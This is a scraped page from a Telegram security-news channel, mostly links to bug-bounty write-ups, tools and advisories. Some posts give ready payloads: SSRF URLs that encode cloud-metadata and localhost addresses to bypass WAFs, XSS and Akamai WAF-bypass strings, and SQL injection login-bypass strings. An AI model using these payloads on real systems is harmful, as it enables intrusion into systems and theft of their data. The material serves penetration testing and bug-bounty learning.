Information Security – Telegram

Information Security

414 subscribers

157 photos

5 videos

9 files

2.28K links

Information Security News

we are @sec_nerd twin brother

Download Telegram

About

Blog

Apps

Platform

Information Security

414 subscribers

Information Security

SSRF's to bypass WAF
http://⑯⑨。②⑤④。⑯⑨｡②⑤④/
http://⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ｡⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤｡⑤①⓪｡④②⑤｡⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥

125 views10:44

Information Security

#bugbountytip The Request.queryString error in .NET avoids you to get XSS? Try the %uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e payload ;)

117 views10:44

Information Security

https://github.com/solemnwarning/rehex/releases/tag/0.1.0

solemnwarning/rehex

Reverse Engineers' Hex Editor. Contribute to solemnwarning/rehex development by creating an account on GitHub.

115 views10:49

Information Security

https://lab.wallarm.com/graphql-batching-attack/amp/?__twitter_impression=true

GraphQL Batching Attack - Wallarm Blog

There is a new attack surface when the app tech stack includes GraphQL. It's Batched Attacks on GraphQL APIs. How can these apps be protected? Read more to find out.

115 views16:02

Information Security

https://honoki.net/2020/02/18/http-request-smuggling-5-practical-tips/

109 views16:24

Information Security

https://medium.com/cognite/pwn2own-or-not2pwn-part-2-16347b2047cf

Pwn2Own or Not2Pwn, Part 2

By Fredrik Østrem, Emil Sandstø and Cim Stordal

105 views18:21

Information Security

5 Subdomain Takeover #ProTips.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/5%20Subdomain%20Takeover%20%23ProTips.pdf
Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2-part-100-article/Finding%20the%20Balance%20Between%20Speed%20&%20Accuracy%20During%20an%20Internet-wide%20Port%20Scanning.pdf
Phishing With a Rogue Wi-Fi Access Point.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/Phishing%20With%20a%20Rogue%20Wi-Fi%20Access%20Point.pdf
#bugbountytip #Hacking #OSINT #Pentest

blaCCkHatHacEEkr/PENTESTING-BIBLE

This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .L...

107 views18:26

Information Security

https://github.com/preempt/ntlm-scanner

GitHub - preempt/ntlm-scanner: A simple python tool based on Impacket that tests servers for various known NTLM vulnerabilities

A simple python tool based on Impacket that tests servers for various known NTLM vulnerabilities - preempt/ntlm-scanner

96 views18:27

Information Security

https://twitter.com/Hacker_Sujeet/status/1238152947055218688?s=20

Regular expression to find URLs within a string 1.This is the 1 I use Works for me (http|ftp|https)://([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])? 2. "(?:(?:https?|ftp):\\/\\/)?[\\w/\\-?=%.]+\\.[\\w/\\-?=%.]+" 3.((http|ftp|https):\/\/)?(([\w.…

118 views18:34

Information Security

A good way to bypass the Akamai WAF by exploiting a redirect-based XSS is with the following payload:

javascript:new%20Function`al\ert\`1\``;

You can also obfuscate it using HTML entities

#BugBounty

116 views18:35

Information Security

Social Distancing Survival Guide

Learn...

Reverse Engineering:
https://github.com/tylerha97/awesome-reversing

Reverse Engineering Malware:
https://malwareunicorn.org/workshops/re101.html#0
https://malwareunicorn.org/workshops/re102.html#0

Web Hacking:
https://portswigger.net/web-security
https://github.com/infoslack/awesome-web-hacking/blob/master/README.md

Exploit Development:
https://github.com/FabioBaroni/awesome-exploit-development/blob/master/README.md

GitHub - tylerha97/awesome-reversing: A curated list of awesome reversing resources

A curated list of awesome reversing resources. Contribute to tylerha97/awesome-reversing development by creating an account on GitHub.

123 views11:30

Information Security

APT Lifecycle:
https://azeria-labs.com/advanced-persistent-threat/

Arm Assembly:
https://azeria-labs.com/writing-arm-assembly-part-1/

Arm32 Shellcoding:
https://azeria-labs.com/writing-arm-shellcode/
https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/

Heap Exploitaiton:
https://azeria-labs.com/heap-exploit-development-part-1/
https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/
https://azeria-labs.com/grooming-the-ios-kernel-heap/

Advanced Persistent Threat

109 viewsedited 11:31

Information Security

Pentesting IoT devices

Part 1: https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html

Part 2: https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html

Books and resources: https://github.com/V33RU/IoTSecurity101/blob/master/README.md

Pentesting IoT devices (Part 1: Static Analysis)

Introduction Intelligent dishwashers, smart factories, connected sensors and Wi-Fi fridges, these are only a few examples of everyday ...

106 views11:31

Information Security

https://ssd-disclosure.com/archives/4097/ssd-advisory-horde-groupware-webmail-edition-remote-code-execution

SSD Secure Disclosure

SSD Advisory - Horde Groupware Webmail Edition Remote Code Execution - SSD Secure Disclosure

Vulnerability Summary The Horde project comprises of several standalone applications and libraries. The Horde Groupware Webmail Edition suite bundles several of them by default, among those, Data is a library used to manager data import/export in several…

178 views12:59

Information Security

#bugbounty

Pentest-guide
https://github.com/Voorivex/pentest-guide
naabu
https://github.com/projectdiscovery/naabu
Osmedeus
https://github.com/j3ssie/Osmedeus
SubDomainizer
https://github.com/nsonaniya2010/SubDomainizer
security-tools
https://github.com/bl4de/security-tools
assessment-mindset
https://github.com/dsopas/assessment-mindset
Sudomy
https://github.com/Screetsec/Sudomy

#bugbountytips

GitHub - Voorivex/pentest-guide: Penetration tests guide based on OWASP including test cases, resources and examples.

Penetration tests guide based on OWASP including test cases, resources and examples. - Voorivex/pentest-guide

108 views13:01

Information Security

https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/

[CVE-2020-8518] Horde Groupware Webmail Edition 5.2.22 — RCE in CSV data import

A vulnerability in the handling of CSV data import allows authenticated users to inject arbitrary PHP code thus achieving RCE on the server hosting the web application.

103 views13:03

Information Security

https://www.lares.com/hunting-azure-admins-for-vertical-escalation/

Hunting Azure Admins for Vertical Escalation - Lares

There is a lot of excellent public research on attacking Azure, however, most research tends to focus on tactics that assume you have first obtained some form of access, such as compromised credentials. This post will focus on one example of obtaining those…

105 views13:04

Information Security

https://medium.com/@secureITmania/a-secret-note-to-bug-hunters-about-url-structure-and-its-parsers-2982f70ff6d6

A secret note to Bug hunters about URL structure and its parsers.

Understanding the proper URL structure is important to every Bug bounty hunter. So lets go deep dive into the URL structure.

116 views06:44

Information Security

Another SSRF List:
http://[::]:80/
http://[::]:25/
http://[::]:22/
http://[::]:3128/
http://0000::1:80/
http://0000::1:25/
http://0000::1:22/
http://0000::1:3128/
http://127.0.1.3
http://127.0.0.0
http://0177.0.0.1/
http://2130706433/
http://3232235521/
http://3232235777/

118 views08:39

Information Security

sql injection login bypass

' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*

#payloads #payload #bypass

161 viewsedited 09:09